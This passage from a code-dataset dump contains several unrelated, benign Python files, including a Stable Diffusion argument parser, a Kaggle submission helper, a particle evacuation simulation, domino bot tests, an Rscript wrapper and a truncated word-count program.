face, mutation, bad anatomy, bad proportions, extra limbs, disfigured, malformed limbs, missing arms, missing legs, extra arms, extra legs, fused fingers, too many fingers\",\n help=\"the negative prompt to render\"\n )\n parser.add_argument(\n \"--outdir\",\n type=str,\n nargs=\"?\",\n help=\"dir to write results to\",\n default=\"outputs/txt2img-samples\"\n )\n parser.add_argument(\n \"--skip_grid\",\n action='store_true',\n help=\"do not save a grid, only individual samples. Helpful when evaluating lots of samples\",\n )\n parser.add_argument(\n \"--skip_save\",\n action='store_true',\n help=\"do not save individual samples. For speed measurements.\",\n )\n parser.add_argument(\n \"--ddim_steps\",\n type=int,\n default=50,\n help=\"number of ddim sampling steps\",\n )\n parser.add_argument(\n \"--plms\",\n action='store_true',\n help=\"use plms sampling\",\n )\n parser.add_argument(\n \"--laion400m\",\n action='store_true',\n help=\"uses the LAION400M model\",\n )\n parser.add_argument(\n \"--fixed_code\",\n action='store_true',\n help=\"if enabled, uses the same starting code across samples \",\n )\n parser.add_argument(\n \"--ddim_eta\",\n type=float,\n default=0.0,\n help=\"ddim eta (eta=0.0 corresponds to deterministic sampling\",\n )\n parser.add_argument(\n \"--n_iter\",\n type=int,\n default=2,\n help=\"sample this often\",\n )\n parser.add_argument(\n \"--H\",\n type=int,\n default=512,\n help=\"image height, in pixel space\",\n )\n parser.add_argument(\n \"--W\",\n type=int,\n default=512,\n help=\"image width, in pixel space\",\n )\n parser.add_argument(\n \"--C\",\n type=int,\n default=4,\n help=\"latent channels\",\n )\n parser.add_argument(\n \"--f\",\n type=int,\n default=8,\n help=\"downsampling factor\",\n )\n parser.add_argument(\n \"--n_samples\",\n type=int,\n default=3,\n help=\"how many samples to produce for each given prompt. A.k.a. batch size\",\n )\n parser.add_argument(\n \"--n_rows\",\n type=int,\n default=0,\n help=\"rows in the grid (default: n_samples)\",\n )\n parser.add_argument(\n \"--scale\",\n type=float,\n default=7.5,\n help=\"unconditional guidance scale: eps = eps(x, empty) + scale * (eps(x, cond) - eps(x, empty))\",\n )\n parser.add_argument(\n \"--from-file\",\n type=str,\n help=\"if specified, load prompts from this file\",\n )\n parser.add_argument(\n \"--config\",\n type=str,\n default=\"configs/stable-diffusion/v1-inference.yaml\",\n help=\"path to config which constructs model\",\n )\n parser.add_argument(\n \"--ckpt\",\n type=str,\n default=\"models/ldm/stable-diffusion-v1/model.ckpt\",\n help=\"path to checkpoint of model\",\n )\n parser.add_argument(\n \"--seed\",\n type=int,\n default=42,\n help=\"the seed (for reproducible sampling)\",\n )\n parser.add_argument(\n \"--precision\",\n type=str,\n help=\"evaluate at this precision\",\n choices=[\"full\", \"autocast\"],\n default=\"autocast\"\n )\n\n parser.add_argument(\n \"--embedding_path\",\n type=str,\n help=\"Path to a pre-trained embedding manager checkpoint\")\n\n opt = parser.parse_args()\n\n return opt\n","repo_name":"yeonsumia/momentum-textual-inversion","sub_path":"util/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":9228,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"19332259214","text":"from bs4 import BeautifulSoup\nfrom zipfile import ZipFile\nimport requests\n\n\nsession = requests.Session() \ncompetition_name = ''\n\n\ndef init(user_email, password, _competition_name):\n global competition_name\n \n URL = \"https://www.kaggle.com/account/login\"\n login_data = {\n 'UserName': user_email,\n 'Password': password,\n 'JavaScriptEnabled' : True\n }\n competition_name = _competition_name\n r = session.post(URL, data=login_data)\n \n test_URL = 'https://www.kaggle.com/c/%s/submissions/attach' % competition_name\n \n r = session.get(test_URL)\n if r.url == test_URL :\n print('Login Succeed')\n return True\n print('Login Failed')\n return False\n\n\n#@filename = file_path\n#@compress = True or False for compressing to .zip\ndef submission(csv_filename, compress):\n global competition_name\n \n filename = csv_filename\n if compress == True :\n with ZipFile(csv_filename, 'w') as myzip:\n filename = csv_filename + \".zip\"\n myzip.write(filename)\n \n r_pre = session.get('https://www.kaggle.com/c/%s/submissions/attach' % competition_name)\n soup = BeautifulSoup(r_pre.content, 'html.parser')\n token = soup.find('input', {'name': '__RequestVerificationToken'})['value']\n competition_id = soup.find('input', {'name': 'CompetitionId'})['value']\n \n payload = {\n 'CompetitionId': competition_id,\n '__RequestVerificationToken': token,\n 'IsScriptVersionSubmission': 'False',\n 'SubmissionDescription': 'This-is-description!'\n }\n files = {\n 'SubmissionUpload': open(filename, 'rb')\n }\n \n r = session.post('https://www.kaggle.com/competitions/submissions/accept', data=payload, files=files)\n if r.status_code == 200:\n print(\"Submission Succeed\")\n return True\n print(\"Submission Failed\")\n return False\n","repo_name":"dbgsprw/KaggleAutoSubmission","sub_path":"KAS.py","file_name":"KAS.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3705438443","text":"import os\n\n# Root directory to perform build operations.\n# For testing/development, this can be changed to redirect build scripts away\n# from the build server, e.g. a user's home directory. Set the environment\n# variables DLSBUILD_ROOT_DIR and/or DLSBUILD_WIN_ROOT_DIR to override the\n# default location.\n# Be sure that the root dir contains the expected directories (e.g. work/etc/build/queue).\nDLSBUILD_ROOT_DIR = os.getenv(\"DLSBUILD_ROOT_DIR\", \"/dls_sw\")\nDLSBUILD_WIN_ROOT_DIR = os.getenv(\"DLSBUILD_WIN_ROOT_DIR\", \"W:/\")\n\nLDAP_SERVER_URL = 'ldap://altfed.cclrc.ac.uk'\nGIT_ROOT = \"dascgitolite@dasc-git.diamond.ac.uk\"\n\n_gelflog_server_addr = os.getenv('ADE_GELFLOG_SERVER', \"graylog2.diamond.ac.uk:12201\").split(':')\nGELFLOG_SERVER = _gelflog_server_addr[0]\nGELFLOG_SERVER_PORT = _gelflog_server_addr[1]\n\n_syslog_server = os.getenv(\"ADE_SYSLOG_SERVER\", \"{}:12209\".format(GELFLOG_SERVER)).split(':')\nSYSLOG_SERVER = _syslog_server[0]\nSYSLOG_SERVER_PORT = _syslog_server[1]\n\nBUILD_SERVERS = {\n \"Linux\": {\n \"redhat6-x86_64\": [\"R3.14.12.3\"],\n \"redhat7-x86_64\": [\"R3.14.12.7\"],\n },\n \"Windows\": {\n \"windows6-x86\" : [\"R3.14.12.3\"],\n \"windows6-AMD64\" : [\"R3.14.12.3\"],\n \"windows6_3-AMD64\" : [\"R3.14.12.7\"],\n }\n}\n\nSERVER_SHORTCUT = {\n \"6\": \"redhat6-x86_64\",\n \"7\": \"redhat7-x86_64\",\n \"32\": \"windows6-x86\",\n \"64\": \"windows6-AMD64\",\n \"64_2012\": \"windows6_3-AMD64\",\n}\n\n","repo_name":"EmilioPeJu/dls_ade","sub_path":"dls_ade/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41661448797","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndataLRS=pd.read_csv('/media/student/SPATIU/LTSID/Metrics/metrics_C.csv', sep=' ', header=None)\ndata=pd.read_csv('/media/student/SPATIU/LTSID/Metrics/metrics_D.csv', sep=\" \", header=None)\npsnr_C=dataLRS[1].values\nssim_C=dataLRS[3].values\npsnr_D=data[1].values\nssim_D=data[3].values\n\navg_C=np.mean(psnr_C)\navg_D=np.mean(psnr_D)\nplt.xlabel('Photo')\nplt.ylabel('PSNR')\nplt.title('PSNR_Classic VS. PSNR_Dropout')\nline_up, = plt.plot(np.array(range(0, len(psnr_C))), psnr_C, label='PSNR Classic avg: %0.5f ' % (avg_C))\nline_down, = plt.plot(np.array(range(0, len(psnr_D))), psnr_D, label='PSNR Dropout avg: %0.5f ' % (avg_D))\nplt.legend(handles=[line_up, line_down])\n\nplt.show()\n\nminLRS=np.mean(ssim_C)\nminOri=np.mean(ssim_D)\nplt.xlabel('Photo')\nplt.ylabel('PSNR')\nplt.title('SSIM_Classic VS. SSIM_Dropout')\nline_up, = plt.plot(np.array(range(0, len(ssim_C))), ssim_C, label='SSIM Classic avg: %0.5f ' % (minLRS))\nline_down, = plt.plot(np.array(range(0, len(ssim_D))), ssim_D, label='SSIM Dropout avg: %0.5f ' % (minOri))\nplt.legend(handles=[line_up, line_down])\n\nplt.show()\n","repo_name":"florinSacadat/LearningToSeeInTheDark","sub_path":"PlotMetrics.py","file_name":"PlotMetrics.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43726007736","text":"import collections\nimport unittest\n\nfrom networkx import edges\n\nfrom src.Domino import Domino\nfrom src.GameState import GameState\nfrom src.Train import Train\nfrom src.bots.state.BotGameState import BotGameState, BotMove\nfrom src.bots.state.BotTrain import BotTrain\nfrom src.bots.state.Path import Path\nfrom src.bots.state.Play import Play\n\n\nclass BotGameStateTest(unittest.TestCase):\n def get_test_game_state(self):\n game_state = GameState(5)\n player = game_state.players[0]\n\n game_state.trains.append(Train(0, 10, game_state.players[0])) # mine\n game_state.trains.append(Train(1, 11, game_state.players[1])) # private\n game_state.trains.append(Train(2, 12, game_state.players[2])) # same start as 3\n game_state.trains.append(Train(3, 12, game_state.players[3])) # same start as 2\n game_state.trains.append(Train(5, 3, None)) # mexican\n\n game_state.trains[2].make_public()\n game_state.trains[3].make_public()\n game_state.trains[4].make_public()\n\n player.dominoes.append(Domino(10, 10)) # can play on t0\n player.dominoes.append(Domino(6, 3)) # can play on t4\n player.dominoes.append(Domino(0, 12)) # can play on t2 and t3\n player.dominoes.append(Domino(11, 8)) # cannot play, private\n player.dominoes.append(Domino(4, 3)) # can play on t4\n player.dominoes.append(Domino(2, 12)) # can play on t2 and t3\n player.dominoes.append(Domino(0, 1)) # can play on d2\n player.dominoes.append(Domino(1, 3)) # can play on d4 and d6 and t4\n player.dominoes.append(Domino(3, 0)) # loop between d7 and d8, can also play on d4 and t4\n\n return game_state, BotGameState(game_state, player)\n\n def test_bot_game_state(self):\n game_state, bot_game_state = self.get_test_game_state()\n bot_trains = []\n for train in game_state.trains:\n bot_trains.append(BotTrain(train, train.identity.owner))\n\n self.assertEqual(bot_trains[0], bot_game_state.my_train)\n self.assertIn(bot_trains[1], bot_game_state.other_trains)\n self.assertIn(bot_trains[0], bot_game_state.playable_trains)\n self.assertIn(bot_trains[2], bot_game_state.playable_trains)\n self.assertIn(bot_trains[3], bot_game_state.playable_trains)\n self.assertIn(bot_trains[4], bot_game_state.playable_trains)\n\n self.assertTrue(bot_game_state.mexican_train.identity.mexican)\n\n self.assertEqual(game_state.played_count, bot_game_state.played_count)\n\n for domino in bot_game_state.dominoes:\n self.assertIn(domino, bot_game_state.dominoes_for_number[domino.left])\n self.assertIn(domino, bot_game_state.dominoes_for_number[domino.right])\n\n def test_draw_domino(self):\n game_state, bot_game_state = self.get_test_game_state()\n d = Domino(3, 3)\n bot_game_state.draw_domino(d)\n self.assertIn(d, bot_game_state.dominoes)\n self.assertIn(BotMove(d, bot_game_state.all_trains[4]), bot_game_state.get_all_valid_moves())\n self.assertIn(d, bot_game_state.dominoes_for_number[3])\n self.assertIn((3, 3), edges(bot_game_state.graph))\n\n def test_get_unplayed_count(self):\n game_state, bot_game_state = self.get_test_game_state()\n for i in range(0, 13):\n self.assertEqual(13 - game_state.played_count[i], bot_game_state.get_unplayed_count(i))\n\n def test_do_move(self):\n game_state, bot_game_state = self.get_test_game_state()\n domino = bot_game_state.dominoes[0]\n train = bot_game_state.all_trains[0]\n bot_game_state.do_move(BotMove(domino, train))\n self.assertNotIn(domino, bot_game_state.dominoes)\n self.assertNotIn(domino, bot_game_state.dominoes_for_number[10])\n self.assertEqual(1, bot_game_state.played_count[10])\n self.assertEqual(12, bot_game_state.get_unplayed_count(10))\n self.assertEqual(domino, train.cars[-1])\n self.assertIn(train, bot_game_state.trains_for_number[10])\n\n domino = bot_game_state.dominoes[0] # Domino(6, 3) was previously [1], but is now []0 since we popped [0]\n train = bot_game_state.all_trains[4]\n bot_game_state.do_move(BotMove(domino, train))\n self.assertNotIn(domino, bot_game_state.dominoes)\n self.assertNotIn(domino, bot_game_state.dominoes_for_number[6])\n self.assertNotIn(domino, bot_game_state.dominoes_for_number[3])\n self.assertEqual(1, bot_game_state.played_count[6])\n self.assertEqual(1, bot_game_state.played_count[3])\n self.assertEqual(12, bot_game_state.get_unplayed_count(6))\n self.assertEqual(12, bot_game_state.get_unplayed_count(3))\n self.assertEqual(domino, train.cars[-1])\n self.assertIn(train, bot_game_state.trains_for_number[6])\n self.assertNotIn(train, bot_game_state.trains_for_number[3])\n\n def test_get_all_valid_moves(self):\n game_state, bot_game_state = self.get_test_game_state()\n\n moves = bot_game_state.get_all_valid_moves()\n\n expected_moves = [BotMove(bot_game_state.dominoes[0], bot_game_state.all_trains[0]),\n BotMove(bot_game_state.dominoes[1], bot_game_state.all_trains[4]),\n BotMove(bot_game_state.dominoes[2], bot_game_state.all_trains[2]),\n BotMove(bot_game_state.dominoes[2], bot_game_state.all_trains[3]),\n BotMove(bot_game_state.dominoes[4], bot_game_state.all_trains[4]),\n BotMove(bot_game_state.dominoes[5], bot_game_state.all_trains[3]),\n BotMove(bot_game_state.dominoes[5], bot_game_state.all_trains[2]),\n BotMove(bot_game_state.dominoes[7], bot_game_state.all_trains[4]),\n BotMove(bot_game_state.dominoes[8], bot_game_state.all_trains[4])]\n self.assertEqual(collections.Counter(expected_moves), collections.Counter(moves))\n\n def test_get_all_paths_from(self):\n game_state, bot_game_state = self.get_test_game_state()\n\n path_dict = bot_game_state.get_all_paths_from(12)\n self.assertEqual(1, len(path_dict))\n paths = path_dict[12]\n\n expected_paths = [Path([(12, 2)]),\n Path([(12, 0)]),\n Path([(12, 0), (0, 1)]),\n Path([(12, 0), (0, 1), (1, 3)]),\n Path([(12, 0), (0, 1), (1, 3), (3, 4)]),\n Path([(12, 0), (0, 1), (1, 3), (3, 6)]),\n Path([(12, 0), (0, 1), (1, 3), (3, 0)]),\n Path([(12, 0), (0, 3)]),\n Path([(12, 0), (0, 3), (3, 4)]),\n Path([(12, 0), (0, 3), (3, 6)]),\n Path([(12, 0), (0, 3), (3, 1)]),\n Path([(12, 0), (0, 3), (3, 1), (1, 0)])]\n self.assertEqual(collections.Counter(expected_paths), collections.Counter(paths))\n\n path_dict = bot_game_state.get_all_paths_from(3)\n self.assertEqual(1, len(path_dict))\n paths = path_dict[3]\n\n expected_paths = [Path([(3, 4)]),\n Path([(3, 6)]),\n Path([(3, 0)]),\n Path([(3, 1)]),\n Path([(3, 1), (1, 0)]),\n Path([(3, 1), (1, 0), (0, 12)]),\n Path([(3, 1), (1, 0), (0, 12), (12, 2)]),\n Path([(3, 1), (1, 0), (0, 3)]),\n Path([(3, 1), (1, 0), (0, 3), (3, 4)]),\n Path([(3, 1), (1, 0), (0, 3), (3, 6)]),\n Path([(3, 0), (0, 12)]),\n Path([(3, 0), (0, 12), (12, 2)]),\n Path([(3, 0), (0, 1)]),\n Path([(3, 0), (0, 1), (1, 3)]),\n Path([(3, 0), (0, 1), (1, 3), (3, 4)]),\n Path([(3, 0), (0, 1), (1, 3), (3, 6)])]\n self.assertEqual(collections.Counter(expected_paths), collections.Counter(paths))\n\n def test_get_longest_paths_from(self):\n game_state, bot_game_state = self.get_test_game_state()\n\n paths = bot_game_state.get_longest_paths_from(bot_game_state.get_playable_numbers())\n expected_paths = [Path([(12, 0), (0, 1), (1, 3), (3, 4)]),\n Path([(12, 0), (0, 1), (1, 3), (3, 6)]),\n Path([(12, 0), (0, 1), (1, 3), (3, 0)]),\n Path([(12, 0), (0, 3), (3, 1), (1, 0)]),\n Path([(3, 1), (1, 0), (0, 12), (12, 2)]),\n Path([(3, 1), (1, 0), (0, 3), (3, 4)]),\n Path([(3, 1), (1, 0), (0, 3), (3, 6)]),\n Path([(3, 0), (0, 1), (1, 3), (3, 4)]),\n Path([(3, 0), (0, 1), (1, 3), (3, 6)])]\n self.assertEqual(collections.Counter(expected_paths), collections.Counter(paths))\n\n def test_get_playable_numbers(self):\n game_state, bot_game_state = self.get_test_game_state()\n playable_numbers = bot_game_state.get_playable_numbers()\n self.assertEqual(collections.Counter(playable_numbers), collections.Counter([3, 10, 12, 12]))\n\n def test_get_biggest_plays_from(self):\n game_state, bot_game_state = self.get_test_game_state()\n\n plays = bot_game_state.get_biggest_plays_from(bot_game_state.get_playable_numbers())\n expected_play = Play([Path([(10, 10)]),\n Path([(12, 2)]),\n Path([(3, 4)]),\n Path([(12, 0), (0, 1), (1, 3), (3, 0)])])\n\n self.assertEqual(28, len(plays))\n self.assertIn(expected_play, plays)\n","repo_name":"Pellanor/MexicanTrain","sub_path":"tst/bots/BotGameStateTest.py","file_name":"BotGameStateTest.py","file_ext":"py","file_size_in_byte":9755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30525758096","text":"# -*- coding:utf-8 -*-\nimport subprocess as sp\nimport os\nimport time\n\nfrom contextlib import contextmanager\nfrom collections import OrderedDict, namedtuple\n\n\nParsedCompletedCommand = namedtuple(\n 'ParsedCompletedCommand',\n ['returncode', 'args', 'stdout', 'stderr']\n)\n\n\nclass Rscript:\n \"\"\"\n Using subprocess to call Rscript execute R program\n :type file: str, target R file\n :type cmd: str, parameter of target R file \n :type folder: str, default '', only support the sub folder \n\n example:\n >>> import os\n >>> from pyRscript import pyRscript\n >>> RPATH = '/home/pyRscript' # also ex: os.path.join(os.path.dirname(os.path.abspath('test.R')), 'R')\n >>> cmd = '-d,SN1234,-t,2017-07-13 00:00:00'\n >>> r = pyRscript.Rscript(path=RPATH, file='test.R', cmd=cmd)\n >>> print(r)\n >>> \n >>> ret = r.execute()\n >>> print(ret)\n >>> ParsedCompletedCommand(returncode=0, args=['Rscript', 'test.R', '-d', 'SN1234', '-t', '2017-07-13 00:00:00'], stdout='2017-12-03 11:35:38 INFO::Execute R\\n2017-12-03 11:35:39 INFO::id: SN1234, time: 2017-07-13 00:00:00', stderr='Loading required package: methods')\n >>> print(ret.returncode)\n >>> 0\n >>> print(ret.stdout)\n >>> '2017-12-03 11:37:59 INFO::Execute R\\n2017-12-03 11:37:59 INFO::id: SN1234, time: 2017-07-13 00:00:00'\n >>> print(ret.stderr)\n >>> 'Loading required package: methods'\n \"\"\"\n\n def __init__(self, path, file, cmd=None):\n super(Rscript, self).__init__()\n self.file = file\n self.path = path\n if cmd is None:\n self.cmd = []\n else:\n self.cmd = cmd.split(',')\n\n @contextmanager\n def cd(self, newdir):\n \"\"\"\n go to the path\n \"\"\"\n prevdir = os.getcwd()\n os.chdir(newdir)\n try:\n yield\n finally:\n os.chdir(prevdir)\n\n def decode_cmd_out(self, completed_cmd):\n \"\"\"\n return a standard message\n \"\"\"\n try:\n stdout = completed_cmd.stdout.encode('utf-8').decode()\n except AttributeError:\n try:\n stdout = str(bytes(completed_cmd.stdout), 'big5').strip()\n except AttributeError:\n stdout = str(bytes(completed_cmd.stdout).decode('utf-8')).strip()\n try:\n stderr = completed_cmd.stderr.encode('utf-8').decode()\n except AttributeError:\n try:\n stderr = str(bytes(completed_cmd.stderr), 'big5').strip()\n except AttributeError:\n stderr = str(bytes(completed_cmd.stderr).decode('utf-8')).strip()\n return ParsedCompletedCommand(\n completed_cmd.returncode,\n completed_cmd.args,\n stdout,\n stderr\n )\n\n def run_command_under_r_root(self, cmd, catched=True):\n \"\"\"\n subprocess run on here\n \"\"\"\n RPATH = self.path\n with self.cd(newdir=RPATH):\n if catched:\n process = sp.run(cmd, stdout=sp.PIPE, stderr=sp.PIPE)\n else:\n process = sp.run(cmd)\n return process\n\n def execute(self):\n \"\"\"\n Execute R script\n \"\"\"\n rprocess = OrderedDict()\n commands = OrderedDict([\n (self.file, ['Rscript', self.file] + self.cmd),\n ])\n for cmd_name, cmd in commands.items():\n rprocess[cmd_name] = self.run_command_under_r_root(cmd)\n \n return self.decode_cmd_out(completed_cmd=rprocess[self.file])\n\n def __repr__(self):\n fmt = f''\n return fmt\n\n\n","repo_name":"chairco/pyRscript","sub_path":"pyRscript/pyRscript.py","file_name":"pyRscript.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10243782177","text":"\"\"\"Simple plot of units allowed per county vs year\"\"\"\n\nfrom collections import defaultdict\nimport csv\nimport datetime as dt\nimport matplotlib.dates as mdates\nimport matplotlib.pyplot as plt\n\n# Read the data into arrays:\n# years: a list of datetime objects from column 1 of the file\n# units_allowed: a dict of county to units allowed per year from columns 2-4\n#\nyears = []\nunits_allowed = defaultdict(list)\nwith open('darrell_demo.csv') as csvfile:\n csvreader = csv.DictReader(csvfile)\n for row in csvreader:\n for county, units in row.items():\n if county == 'year':\n year = dt.datetime.strptime(units, '%Y')\n years.append(year)\n else:\n units_allowed[county].append(float(units))\n\n# Make plot\n#\nplt.style.use('fivethirtyeight') # Optional plot style\nfig, axis = plt.subplots() # create figure and data-axis objects\n\n# Draw the series:\nfor county, units in units_allowed.items():\n axis.plot(years, units, marker='o', linestyle='--', linewidth=0.9, label=county)\n\n# Legend and axis labels (subtitle's a little tricky)\naxis.xaxis.set_major_formatter(mdates.DateFormatter('%Y')) # print only year on x-axis\naxis.legend(loc='best') # put the legend in a good place\naxis.set_xlabel('Year')\naxis.set_ylabel('Units Permitted')\naxis.set_title('Bay Area County Housing Production')\nplt.suptitle('Units Permitted by County', y=0.88) # hacky subtitle\n\n# Force a fullscreen display, and draw to the screen\nplt.get_current_fig_manager().full_screen_toggle()\nplt.show()\n","repo_name":"kesterallen/dateplottingdemo","sub_path":"darrell_demo.py","file_name":"darrell_demo.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23941929211","text":"import cv2\nimport numpy as np\nfrom IPython import display as display\n\nimport ipywidgets as ipw\nimport PIL\nfrom io import BytesIO\nimport random\n\nclass Particle:\n MAX_VELOCITY = np.sqrt(4)\n \n def __init__(self, x_position, y_position, x_velocity, y_velocity, radio, is_wall_particle = False):\n self.radio = radio\n self.position = np.array([float(x_position), float(y_position)])\n self.velocity = np.array([float(x_velocity), float(y_velocity)])\n self.is_wall_particle = is_wall_particle\n self.force = np.array([0.0, 0.0])\n \n def normalize_vector(self, x):\n norm = np.linalg.norm(x)\n if norm == 0:\n return x * np.inf\n return x / norm\n \n def calculate_force(self, particle):\n if self.is_wall_particle:\n return np.array([0.,0.])\n position2 = particle.position\n distance = np.linalg.norm(self.position - position2)\n if distance <= self.radio + particle.radio:\n return self.normalize_vector(self.position - position2) / (distance ** 2)*100\n \n return np.array([0.,0.])\n \n def update_position(self):\n if self.is_wall_particle:\n return\n self.position += self.velocity\n\n def update_velocity(self):\n if self.is_wall_particle:\n return\n self.velocity += self.force\n\n velocity_magnitude = np.linalg.norm(self.velocity)\n\n if velocity_magnitude > self.MAX_VELOCITY:\n self.velocity = self.normalize_vector(self.velocity) * self.MAX_VELOCITY\n return\n \n def graph(self, x0, y0, img):\n if self.is_wall_particle:\n color = (255, 255, 255)\n cv2.circle(img, (int(x0 + self.position[0]), int(y0 - self.position[1])), int(self.radio) - 10, color, -1)\n else:\n color = (255, 0, 0)\n cv2.circle(img, (int(x0 + self.position[0]), int(y0 - self.position[1])), int(self.radio), color, -1)\n\n \n return\n\n\nparticles = []\n\ndef lineOfWallParticles(x1, y1, x2, y2, N):\n x=np.linspace(x1, x2, N)\n y=np.linspace(y1, y2, N)\n for i in range(N):\n particles.append(Particle(x[i], y[i], 0, 0, 20, True))\n\nwIm = ipw.Image()\ndisplay.display(wIm)\n\nmaxX=500\nmaxY=500\nx0 = int(maxX/2)\ny0 = int(maxY/2)\nparticles_radio = 6\n \nimg = np.zeros((500, 500, 3), dtype=\"uint8\")\n\nheight = 100\nwidth = 100\nlineOfWallParticles(-width,height,width,height, int(width / 10 + 3)) # Bottom boundary\nlineOfWallParticles(-width,-height,width,-height, int(width / 10 + 3)) # Upper boundary\nlineOfWallParticles(-width,height,-width,-height, int(height / 10 + 3)) # Left boundary\n#lineOfWallParticles(width,-height,width,height, int(height / 10 + 3))\nlineOfWallParticles(width,-height,width,-20, int(height / 10 + 3)) \nlineOfWallParticles(width,20,width,height, int(height / 10 + 3))\n\n# Draw obstacle in front of exit\nlineOfWallParticles(45,5,55,0, 2)\nlineOfWallParticles(55,0,45,-5, 2)\nlineOfWallParticles(45,-5,35,0, 2)\nlineOfWallParticles(35,0,45,5, 2)\n\nfor i in range(50):\n particles.append(Particle(random.randint(-width + 20, -width + 40), random.randint(-height + 20, height - 20), random.random(), random.random() - 0.5, particles_radio))\n #particles.append(Particle(random.randint(-width + 20, width - 20), random.randint(-height + 20, height - 20), random.random(), random.random() - 0.5, particles_radio))\n\nMaxIterations = 10000\n\nNumParticles = len(particles)\nexit = np.array([200, 0])\n\n\nfor count in range(MaxIterations):\n img[:] = (0, 0, 0)\n for i in range(NumParticles):\n for j in range(NumParticles):\n if i != j:\n Fij = particles[i].calculate_force(particles[j])\n particles[i].force += Fij\n # Add a force to pull them to the exit\n norm = np.linalg.norm(exit - particles[i].position)\n exit_force = (exit - particles[i].position ) / (norm if norm > 0 else 1)\n exit_force[0] *= 0.001\n exit_force[1] *= 0.009\n particles[i].force += exit_force\n\n for particle in particles:\n particle.update_velocity()\n particle.update_position()\n particle.graph(x0, y0, img)\n particle.force[:] = 0\n pilIm = PIL.Image.fromarray(img, mode=\"RGB\")\n with BytesIO() as fOut:\n pilIm.save(fOut, format=\"png\")\n byPng = fOut.getvalue()\n \n wIm.value=byPng ","repo_name":"DonaldoAyala/evolutionary-computing","sub_path":"7 - Particle Systems/evacuation.py","file_name":"evacuation.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20639714799","text":"# coding: utf-8\nimport os\nimport cv2\nimport time\n\nfrom calligraphyJiZiByStrokeCompose.util import query_char_info, query_char_target_strokes, stroke_recompose, \\\n load_stroke_library_dataset, query_char_info_from_chars_list, query_char_target_stroke_by_dataset\n\n\ndef recompose():\n start_time = time.time()\n stroke_lib_path = \"../../../Data/Stroke_recomposed_tool/strokes dataset\"\n\n save_path = \"../../../Data/1000 generated results\"\n dataset = load_stroke_library_dataset(stroke_lib_path)\n print(\"Load dataset time: \", time.time() - start_time)\n\n heng_zhe = dataset['横折横折']\n print(len(heng_zhe))\n\n chars = ['犍']\n\n char_info_list = query_char_info_from_chars_list(chars)\n\n char_target_strokes_list = query_char_target_stroke_by_dataset(dataset, char_info_list)\n\n generated_imgs, _ = stroke_recompose(char_info_list, char_target_strokes_list)\n\n for i in range(len(generated_imgs)):\n cv2.imshow('img_%d' % i, generated_imgs[i])\n cv2.imwrite(os.path.join(save_path, \"%s_%04d.png\" % (chars[0], 0)), generated_imgs[i])\n\n\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\n\n\n\n\nif __name__ == '__main__':\n recompose()","repo_name":"plateaukao/CSInTraditionalChineseCalligraphy","sub_path":"calligraphyJiZiByStrokeCompose/recompose_algorithm_test.py","file_name":"recompose_algorithm_test.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"72213530066","text":"#!/usr/bin/python\r\nimport os\r\n\r\n#Final Diagramación Lógica / Fecha: 2/6/18\r\n#Tema: Crear un WC - Contador de palabras, líneas y caracteres.\r\n#Alumno: Alberto Campagna\r\n#IFTS 18 - Analista de Sistemas\r\n\r\n# ----------------------- MENU ----------------------- #\r\ndef menu():\r\n print('')\r\n print(\"--------------------\")\r\n print(\"- Programa WC -\")\r\n print(\"--------------------\")\r\n print('')\r\n print('1. Ingresar archivo')\r\n print('2. Mostrar archivo')\r\n print('3. Buscador archivo')\r\n print('4. Salir')\r\n print('')\r\n# --------------------- PALABRAS --------------------- #\r\ndef palabras():\r\n cant_palabras = len(contenido3)\r\n return(cant_palabras)\r\n# ---------------------- LINEAS ---------------------- #\r\ndef lineas():\r\n cant_lineas = sum(1 for line in open(ingreso))\r\n return(cant_lineas)\r\n# --------------------- PARRAFOS --------------------- #\r\ndef parrafos():\r\n parrafos = contenido.split('.\\n')\r\n cant_parrafos = len(parrafos)\r\n return(cant_parrafos)\r\n# ---------------------- LETRAS ---------------------- #\r\ndef letras():\r\n letras = 0\r\n for i in contenido3:\r\n letras = letras + len(i)\r\n return(letras)\r\n# ---------------------------------------------------- #\r\n\r\nwhile True:\r\n menu()\r\n try:\r\n opcion = int(input('Ingrese una opción: '))\r\n if opcion == 4:\r\n print (' ')\r\n print('Gracias por usar este programa.')\r\n break\r\n ingreso = input('Ingrese el archivo: ')\r\n archivo = open(ingreso,'r')\r\n contenido = archivo.read()\r\n contenido1 = contenido.replace('\\n',' ')\r\n contenido2 = contenido1.replace(' ',' ')\r\n contenido3 = contenido2.split(\" \")\r\n \r\n if opcion == 1:\r\n print('')\r\n print('El texto tiene {} palabras, {} líneas, {} párrafos y {} letras.'\r\n .format(palabras(),lineas(),parrafos(),letras()))\r\n print('')\r\n \r\n elif opcion == 2:\r\n archivo = open(ingreso,'r')\r\n for linea in archivo.readlines(): \r\n print (linea)\r\n archivo.close()\r\n \r\n elif opcion == 3:\r\n archivo = open(ingreso,'r')\r\n string = input('Ingrese que palabra buscar: ')\r\n lista = contenido.count(string)\r\n print('La letra/palabra \"{}\" aparece {} veces.'.format(string,lista))\r\n \r\n elif opcion != 1 or 2 or 3 or 4 or 0:\r\n menu()\r\n\r\n archivo.close()\r\n \r\n except:\r\n print('Ingrese una opción 